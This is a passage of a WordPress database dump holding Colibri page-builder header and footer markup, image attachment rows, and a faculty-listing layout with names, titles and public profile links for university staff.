style-local-25-h5-text\">[colibri_site_title]</span></a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-39-outer style-local-25-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"25-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-39 style-local-25-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h7\" class=\"style-40 style-local-25-h7 position-relative h-element\">\n                      <!---->\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-41-outer style-local-25-h8-outer\">\n                <div data-colibri-id=\"25-h8\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-41 style-local-25-h8 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h9\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-tablet h-menu-horizontal h-dropdown-menu style-42 style-local-25-h9 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"bordered-active-item bordered-active-item--bottom effect-borders-grow grow-from-center\" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"25-h10\" class=\"h-mobile-menu h-global-transition-disable style-43 style-local-25-h10 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-25-h10\" data-target-id=\"offcanvas-wrapper-25-h10\" data-offcanvas-overlay-id=\"offcanvas-overlay-25-h10\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-25-h10\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-43-offscreen style-local-25-h10-offscreen\">\n                          <div data-colibri-id=\"25-h11\" class=\"d-flex flex-column h-offscreen-panel style-44 style-local-25-h11 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h13\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-45 style-local-25-h13 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-46-outer style-local-25-h14-outer\">\n                                    <div data-colibri-id=\"25-h14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-46 style-local-25-h14 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"25-h15\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-47 style-local-25-h15 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-47-text style-local-25-h15-text\">[colibri_site_title]</span></a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h12\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-50 style-local-25-h12 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h16\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-48 style-local-25-h16 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-49-outer style-local-25-h17-outer\">\n                                    <div data-colibri-id=\"25-h17\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-49 style-local-25-h17 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                                        <!---->\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-25-h10\" class=\"offscreen-overlay style-43-offscreenOverlay style-local-25-h10-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"25-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-57 style-local-25-h24 position-relative\">\n    <!---->\n    <!---->\n    <div style=\"height: 70px; bottom: calc(0px);\" class=\"h-separator\">\n      <svg style=\"fill:#f6f8fa;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1000 100\" preserveAspectRatio=\"none\">\n        <g opacity=\"0.33\">\n          <path d=\"M385.42,52.92c-11.63,4.22-23.18,9-34.52,14.38-103.18,49-91.83-33.55-148.36-.49,50.13,17.35,121.87,64.84,270.46.49,11-4.7,64.52-25.43,118-41.8-4-.52-8.45-.95-13.41-1.28C507.83,41.64,455.4,71.84,385.42,52.92Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M0,59.7S48.08,103,116.06,83.43C54.25,76.6,0,39.8,0,39.8Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M916.4,48.1c-55.76,5.45-76.83,2-111.28-7.81-3.09,1.4-6.07,2.81-9,4.22,13.93,8.57,25.54,16.74,33.15,22.39,13,9.8,43,25.4,75.8,22.1S1000,59.7,1000,59.7V36.5s-6.87-4.5-21.48-9.06C966,36.56,946.56,45.15,916.4,48.1Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n        </g>\n        <g opacity=\"0.66\">\n          <path d=\"M771.65,30.49,766.1,28.9c-55-15.81-99.84-18-138.66-13.76a368.79,368.79,0,0,0-49.81,9.08c5,.33,9.44.76,13.41,1.28a89.13,89.13,0,0,1,13.86,2.7C656.8,44.1,688.5,67.3,734,67.3c19.82,0,38-11.12,62.15-22.79,2.9-1.41,5.88-2.82,9-4.22C795.39,37.52,784.59,34.23,771.65,30.49Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M371,48.4C242,1.8,242,5.4,184.8,20.6,128,35.8,132.3,44.9,89.9,52.5,28.6,63.7,0,0,0,0V39.8S54.25,76.6,116.06,83.43c28.46,3.15,58.53-.05,85.64-16.13l.84-.49c56.53-33.06,45.18,49.44,148.36.49,11.34-5.38,22.89-10.16,34.52-14.38Q378.34,51,371,48.4Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M978.52,27.44C993.13,32,1000,36.5,1000,36.5V0S996.54,14.27,978.52,27.44Z\" transform=\"translate(0 0)\"></path>\n        </g>\n        <path d=\"M0,0S28.6,63.7,89.9,52.5c42.4-7.6,38.1-16.7,94.9-31.9C242,5.4,242,1.8,371,48.4q7.33,2.61,14.42,4.52c70,18.92,122.41-11.28,192.21-28.7a368.79,368.79,0,0,1,49.81-9.08c38.82-4.21,83.68-2.05,138.66,13.76l5.55,1.59c12.94,3.74,23.74,7,33.47,9.8,34.45,9.83,55.52,13.26,111.28,7.81,30.16-3,49.63-11.54,62.12-20.66C996.54,14.27,1000,0,1000,0Z\"\n          transform=\"translate(0 0)\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"25-h25\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-58 style-local-25-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-59-outer style-local-25-h26-outer\">\n            <div data-colibri-id=\"25-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-59 style-local-25-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"25-h27\" class=\"page-title style-60 style-local-25-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-page-title__outer style-60-outer style-local-25-h27-outer\">\n                    <div class=\"h-global-transition-all\">[colibri_page_title tag=\"h1\"]</div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <!---->\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_post','','inherit','closed','closed','','25-revision-v1','','','2023-10-13 11:04:29','2023-10-13 15:04:29','',25,'https://gsudice.dataconn.net/?p=1808',0,'revision','',0),(1809,1,'2023-10-13 11:04:29','2023-10-13 15:04:29','{\"name\":\"hop-footer\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Footers\",\"attrs\":{\"id\":\"Footers\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-copyright\",\"slot\":null,\"parentId\":\"28-f4\",\"index\":0,\"id\":\"28-f5\",\"partialId\":28,\"styleRef\":270,\"type\":\"footer\"}],\"id\":\"28-f4\",\"parentId\":\"28-f3\",\"partialId\":28,\"styleRef\":269,\"type\":\"footer\"}],\"parentId\":\"28-f2\",\"index\":0,\"id\":\"28-f3\",\"partialId\":28,\"styleRef\":268,\"type\":\"footer\"}],\"id\":\"28-f2\",\"parentId\":\"28-f1\",\"partialId\":28,\"styleRef\":267,\"type\":\"footer\"}],\"id\":\"28-f1\",\"ui\":{\"isSelected\":false,\"isHovered\":false},\"type\":\"footer\",\"partialId\":28,\"styleRef\":266}','','','inherit','closed','closed','','29-revision-v1','','','2023-10-13 11:04:29','2023-10-13 15:04:29','',29,'https://gsudice.dataconn.net/?p=1809',0,'revision','',0),(1810,1,'2023-10-13 11:04:29','2023-10-13 15:04:29','<div data-enabled=\"true\" data-colibri-component=\"footer-parallax\" data-colibri-id=\"28-f1\" class=\"page-footer style-266 style-local-28-f1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"28-f2\" id=\"Footers\" class=\"h-section h-section-global-spacing d-flex align-items-lg-end align-items-md-end align-items-end style-267 style-local-28-f2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"28-f3\" class=\"h-row-container gutters-row-lg-1 gutters-row-md-1 gutters-row-2 gutters-row-v-lg-1 gutters-row-v-md-1 gutters-row-v-2 style-268 style-local-28-f3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-1 gutters-col-md-1 gutters-col-2 gutters-col-v-lg-1 gutters-col-v-md-1 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-269-outer style-local-28-f4-outer\">\n            <div data-colibri-id=\"28-f4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-1 h-px-md-1 h-px-2 v-inner-lg-1 v-inner-md-1 v-inner-2 style-269 style-local-28-f4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"28-f5\" class=\"style-270 style-local-28-f5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_copyright]© {year} {site-name}. Created for free using WordPress and\n                    <a target=\"_blank\" href=\"https://colibriwp.com\" rel=\"noopener\">Colibri</a>[/colibri_copyright]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','footer_post','','inherit','closed','closed','','28-revision-v1','','','2023-10-13 11:04:29','2023-10-13 15:04:29','',28,'https://gsudice.dataconn.net/?p=1810',0,'revision','',0),(1812,1,'2023-10-13 12:56:23','2023-10-13 16:56:23','','Faris','','inherit','open','closed','','faris','','','2023-10-13 12:56:23','2023-10-13 16:56:23','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/10/Faris.jpg',0,'attachment','image/jpeg',0),(1813,1,'2023-10-13 12:56:33','2023-10-13 16:56:33','https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-Faris.jpg','cropped-Faris.jpg','','inherit','open','closed','','cropped-faris-jpg','','','2023-10-13 12:57:44','2023-10-13 16:57:44','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-Faris.jpg',0,'attachment','image/jpeg',0),(1814,1,'2023-10-13 12:57:48','2023-10-13 16:57:48','https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-Faris.jpg','cropped-Faris.jpg','','inherit','open','closed','','cropped-faris-jpg-2','','','2023-10-13 12:57:48','2023-10-13 16:57:48','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-Faris-e1697216253732.jpg',0,'attachment','image/jpeg',0),(1815,1,'2023-10-13 13:07:34','2023-10-13 17:07:34','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Faculty\",\"attrs\":{\"id\":\"faculty\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c4\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c5\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1697,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c6\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":2,\"id\":\"182-c7\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c8\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=C5PVPkoAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c9\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c10\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c11\",\"partialId\":182,\"styleRef\":978,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-Portrait-1-e1697202215204.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1701,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c12\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Armin Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":2,\"id\":\"182-c13\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p> Chair and Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c14\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=41ckZZsAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c15\",\"partialId\":182,\"styleRef\":979,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c16\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c17\",\"partialId\":182,\"styleRef\":980,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/sunderraman1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":692,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c18\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Raj Sunderraman\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":2,\"id\":\"182-c19\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Chair and Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c20\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/raj-sunderraman-a5591bb2\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/raj-sunderraman\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?hl=en&user=Wlxc9FEAAAAJ\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c21\",\"partialId\":182,\"styleRef\":981,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c22\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c23\",\"partialId\":182,\"styleRef\":982,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-SRM-360x360-1-e1697202435329.png\",\"caption\":{\"text\":\"\"},\"imageId\":1704,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c24\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Susie Ramisetty-Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":2,\"id\":\"182-c25\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Research Associate Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c26\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Population Health Sciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/susie-ramisetty-mikler-7a0b3014\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/publichealth.gsu.edu\\/profile\\/susie-ramisetty-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=KzNVJwIAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354}]},\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c27\",\"partialId\":182,\"styleRef\":983,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c28\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c29\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-zelikovsky.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":704,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c30\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Alex Zelikovsky\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":2,\"id\":\"182-c31\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Distinguished University Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c32\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/alex-zelikovsky-48a2795\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/alex-zelikovsky\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=UzCRNJwAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c33\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c34\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c35\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-bourgeois.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":696,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c36\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Anu Bourgeois\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":2,\"id\":\"182-c37\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c38\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer 